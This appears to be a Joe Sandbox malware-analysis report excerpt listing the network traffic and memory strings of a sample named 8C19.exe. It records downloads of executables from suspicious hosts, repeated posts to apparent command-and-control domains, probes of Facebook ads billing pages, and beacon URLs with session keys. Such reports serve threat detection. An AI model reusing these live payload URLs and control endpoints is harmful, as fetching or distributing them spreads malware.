                Source: global trafficHTTP traffic detected: GET /upload/ChromeSetup.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: pelegisr.com
                Source: global trafficHTTP traffic detected: GET /ads/manager/account_settings/account_billing HTTP/1.1Connection: Keep-AliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: en,q=0.9;q=0.8,ja;q=0.7,af;q=0.6,am;q=0.5,sq;q=0.4,ar;q=0.3,an;q=0.2,hy;q=0.1,ast;q=0.1,az;q=0.1,bn;q=0.1,eu;q=0.1Host: www.facebook.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36viewport-width: 1920sec-ch-ua: "Chromium";v="104", " Not A; Brand";v="99", "Google Chrome";v="104"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"sec-ch-prefers-color-scheme: lightUpgrade-Insecure-Requests: 1Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: document
                Source: global trafficHTTP traffic detected: GET /login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing HTTP/1.1Connection: Keep-AliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: en,q=0.9;q=0.8,ja;q=0.7,af;q=0.6,am;q=0.5,sq;q=0.4,ar;q=0.3,an;q=0.2,hy;q=0.1,ast;q=0.1,az;q=0.1,bn;q=0.1,eu;q=0.1Host: www.facebook.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36viewport-width: 1920sec-ch-ua: "Chromium";v="104", " Not A; Brand";v="99", "Google Chrome";v="104"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"sec-ch-prefers-color-scheme: lightUpgrade-Insecure-Requests: 1Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: document
                Source: global trafficHTTP traffic detected: GET /ads/manager/account_settings/account_billing HTTP/1.1Connection: Keep-AliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: en,q=0.9;q=0.8,ja;q=0.7,af;q=0.6,am;q=0.5,sq;q=0.4,ar;q=0.3,an;q=0.2,hy;q=0.1,ast;q=0.1,az;q=0.1,bn;q=0.1,eu;q=0.1Host: www.facebook.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36viewport-width: 1920sec-ch-ua: "Chromium";v="104", " Not A; Brand";v="99", "Google Chrome";v="104"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"sec-ch-prefers-color-scheme: lightUpgrade-Insecure-Requests: 1Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: document
                Source: global trafficHTTP traffic detected: GET /login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing HTTP/1.1Connection: Keep-AliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: en,q=0.9;q=0.8,ja;q=0.7,af;q=0.6,am;q=0.5,sq;q=0.4,ar;q=0.3,an;q=0.2,hy;q=0.1,ast;q=0.1,az;q=0.1,bn;q=0.1,eu;q=0.1Host: www.facebook.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36viewport-width: 1920sec-ch-ua: "Chromium";v="104", " Not A; Brand";v="99", "Google Chrome";v="104"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"sec-ch-prefers-color-scheme: lightUpgrade-Insecure-Requests: 1Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: document
                Source: global trafficHTTP traffic detected: GET /testermanmag/myownre/raw/main/explorer.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: github.com
                Source: global trafficHTTP traffic detected: GET /jamesp.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: dldsystem.com
                Source: global trafficHTTP traffic detected: GET /ads/manager/account_settings/account_billing HTTP/1.1Connection: Keep-AliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: en,q=0.9;q=0.8,ja;q=0.7,af;q=0.6,am;q=0.5,sq;q=0.4,ar;q=0.3,an;q=0.2,hy;q=0.1,ast;q=0.1,az;q=0.1,bn;q=0.1,eu;q=0.1Host: www.facebook.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36viewport-width: 1920sec-ch-ua: "Chromium";v="104", " Not A; Brand";v="99", "Google Chrome";v="104"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"sec-ch-prefers-color-scheme: lightUpgrade-Insecure-Requests: 1Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: document
                Source: global trafficHTTP traffic detected: GET /login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing HTTP/1.1Connection: Keep-AliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: en,q=0.9;q=0.8,ja;q=0.7,af;q=0.6,am;q=0.5,sq;q=0.4,ar;q=0.3,an;q=0.2,hy;q=0.1,ast;q=0.1,az;q=0.1,bn;q=0.1,eu;q=0.1Host: www.facebook.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36viewport-width: 1920sec-ch-ua: "Chromium";v="104", " Not A; Brand";v="99", "Google Chrome";v="104"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"sec-ch-prefers-color-scheme: lightUpgrade-Insecure-Requests: 1Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: document
                Source: global trafficHTTP traffic detected: GET /7.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: dldsystem.com
                Source: global trafficHTTP traffic detected: GET /ads/manager/account_settings/account_billing HTTP/1.1Connection: Keep-AliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: en,q=0.9;q=0.8,ja;q=0.7,af;q=0.6,am;q=0.5,sq;q=0.4,ar;q=0.3,an;q=0.2,hy;q=0.1,ast;q=0.1,az;q=0.1,bn;q=0.1,eu;q=0.1Host: www.facebook.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36viewport-width: 1920sec-ch-ua: "Chromium";v="104", " Not A; Brand";v="99", "Google Chrome";v="104"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"sec-ch-prefers-color-scheme: lightUpgrade-Insecure-Requests: 1Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: document
                Source: global trafficHTTP traffic detected: GET /login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing HTTP/1.1Connection: Keep-AliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: en,q=0.9;q=0.8,ja;q=0.7,af;q=0.6,am;q=0.5,sq;q=0.4,ar;q=0.3,an;q=0.2,hy;q=0.1,ast;q=0.1,az;q=0.1,bn;q=0.1,eu;q=0.1Host: www.facebook.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36viewport-width: 1920sec-ch-ua: "Chromium";v="104", " Not A; Brand";v="99", "Google Chrome";v="104"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"sec-ch-prefers-color-scheme: lightUpgrade-Insecure-Requests: 1Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: document
                Source: global trafficHTTP traffic detected: GET /ads/manager/account_settings/account_billing HTTP/1.1Connection: Keep-AliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: en,q=0.9;q=0.8,ja;q=0.7,af;q=0.6,am;q=0.5,sq;q=0.4,ar;q=0.3,an;q=0.2,hy;q=0.1,ast;q=0.1,az;q=0.1,bn;q=0.1,eu;q=0.1Host: www.facebook.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36viewport-width: 1920sec-ch-ua: "Chromium";v="104", " Not A; Brand";v="99", "Google Chrome";v="104"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"sec-ch-prefers-color-scheme: lightUpgrade-Insecure-Requests: 1Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: document
                Source: global trafficHTTP traffic detected: GET /login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing HTTP/1.1Connection: Keep-AliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: en,q=0.9;q=0.8,ja;q=0.7,af;q=0.6,am;q=0.5,sq;q=0.4,ar;q=0.3,an;q=0.2,hy;q=0.1,ast;q=0.1,az;q=0.1,bn;q=0.1,eu;q=0.1Host: www.facebook.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36viewport-width: 1920sec-ch-ua: "Chromium";v="104", " Not A; Brand";v="99", "Google Chrome";v="104"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"sec-ch-prefers-color-scheme: lightUpgrade-Insecure-Requests: 1Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: document
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://hmedenoe.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 180Host: furubujjul.net
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ariymxinp.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 225Host: furubujjul.net
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://okrenbrpq.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 348Host: furubujjul.net
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://gvuhujihq.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 139Host: furubujjul.net
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://pyqxykfbyx.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 334Host: furubujjul.net
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://egupm.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 110Host: furubujjul.net
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ypsqcei.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 184Host: furubujjul.net
                Source: global trafficHTTP traffic detected: GET /s.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 185.174.137.174
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://gayxc.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 340Host: furubujjul.net
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://jnwjh.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 274Host: furubujjul.net
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://kqnukffkf.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 162Host: furubujjul.net
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://njomtuqes.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 202Host: furubujjul.net
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://bcubynupij.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 143Host: furubujjul.net
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://xeebbali.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 302Host: furubujjul.net
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ygjlvm.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 367Host: furubujjul.net
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://pdviimuy.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 349Host: furubujjul.net
                Source: global trafficHTTP traffic detected: GET /check/safe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36Host: aaa.apiaaaeg.com
                Source: global trafficHTTP traffic detected: POST /check/?sid=63657&key=0e7c4366e2f6f45645238b06b04781ad HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36Content-Length: 392Host: aaa.apiaaaeg.com
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://xqxsaedljj.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 294Host: avtlsgosecure.com
                Source: global trafficHTTP traffic detected: GET /check/safe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36Host: aaa.apiaaaeg.com
                Source: global trafficHTTP traffic detected: POST /check/?sid=63683&key=ea932dc463661e5cd554f4fd13e01a3a HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36Content-Length: 392Host: aaa.apiaaaeg.com
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://rpnkx.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 268Host: avtlsgosecure.com
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://clcjalto.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 200Host: avtlsgosecure.com
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://grafs.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 273Host: avtlsgosecure.com
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://dhlyfpb.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 145Host: avtlsgosecure.com
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://gnnnraawcb.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 133Host: avtlsgosecure.com
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://mkheots.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 113Host: avtlsgosecure.com
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://pakvlb.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 159Host: avtlsgosecure.com
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://nyftrqq.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 363Host: avtlsgosecure.com
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://avqnngwqw.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 225Host: avtlsgosecure.com
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://tkavdryu.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 147Host: avtlsgosecure.com
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ewgonaqm.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 266Host: avtlsgosecure.com
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://yuvwvqgqwb.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 200Host: avtlsgosecure.com
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://tekxbw.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 336Host: avtlsgosecure.com
                Source: global trafficHTTP traffic detected: GET /check/safe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36Host: aaa.apiaaaeg.com
                Source: global trafficHTTP traffic detected: POST /check/?sid=63737&key=7ab3af34ad464188e35d31bab8ff7aae HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36Content-Length: 392Host: aaa.apiaaaeg.com
                Source: global trafficHTTP traffic detected: GET /check/safe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36Host: aaa.apiaaaeg.com
                Source: global trafficHTTP traffic detected: POST /check/?sid=63747&key=f3dd785ba062e51ca3ca0a8858cf6030 HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36Content-Length: 392Host: aaa.apiaaaeg.com
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://vwbkimlhg.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 164Host: avtlsgosecure.com
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ksedxblf.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 171Host: avtlsgosecure.com
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://bvenxtm.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 198Host: avtlsgosecure.com
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://wxsohsstcq.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 236Host: avtlsgosecure.com
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://yclscqegh.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 203Host: avtlsgosecure.com
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://dcxytihxr.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 362Host: avtlsgosecure.com
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://btqtaywr.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 361Host: avtlsgosecure.com
                Source: global trafficHTTP traffic detected: GET /check/safe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36Host: aaa.apiaaaeg.com
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://xixace.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 166Host: avtlsgosecure.com
                Source: global trafficHTTP traffic detected: POST /check/?sid=63755&key=d5d0a61724cbb4ad6589c71e993b56b2 HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36Content-Length: 392Host: aaa.apiaaaeg.com
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://umtcicl.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 216Host: avtlsgosecure.com
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://bfdgvxgb.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 171Host: avtlsgosecure.com
                Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
                Source: Joe Sandbox ViewASN Name: CLOUDWEBMANAGE-EUGB CLOUDWEBMANAGE-EUGB
                Source: Joe Sandbox ViewIP Address: 104.21.93.30 104.21.93.30
                Source: Joe Sandbox ViewIP Address: 104.21.93.30 104.21.93.30
                Source: 8C19.exe, 0000000A.00000003.540505674.00000000023DD000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.559703582.00000000023D1000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.566523088.00000000023D1000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.543232930.00000000023DD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://aaa.apiaaaeg.coaa.apiaaaeg.com/
                Source: 8C19.exe, 0000000A.00000003.538167010.00000000023CF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://aaa.apiaaaeg.com/
                Source: 8C19.exe, 0000000A.00000003.540505674.00000000023DD000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.538423863.00000000023DD000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.543232930.00000000023DD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://aaa.apiaaaeg.com/check/?sid=63657&key=0e7c4366e2f6f45645238b06b04781ad
                Source: 8C19.exe, 0000000A.00000003.540505674.00000000023DD000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.538423863.00000000023DD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://aaa.apiaaaeg.com/check/?sid=63657&key=0e7c4366e2f6f45645238b06b04781ad1
                Source: 8C19.exe, 0000000A.00000003.540505674.00000000023DD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://aaa.apiaaaeg.com/check/?sid=63657&key=0e7c4366e2f6f45645238b06b04781ad6
                Source: 8C19.exe, 0000000A.00000003.540505674.00000000023DD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://aaa.apiaaaeg.com/check/?sid=63657&key=0e7c4366e2f6f45645238b06b04781adg
                Source: 8C19.exe, 0000000A.00000003.559756913.00000000023DD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://aaa.apiaaaeg.com/check/?sid=63683&key=ea932dc463661e5cd554f4fd13e01a3a
                Source: 8C19.exe, 0000000A.00000003.559756913.00000000023DD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://aaa.apiaaaeg.com/check/?sid=63683&key=ea932dc463661e5cd554f4fd13e01a3aal
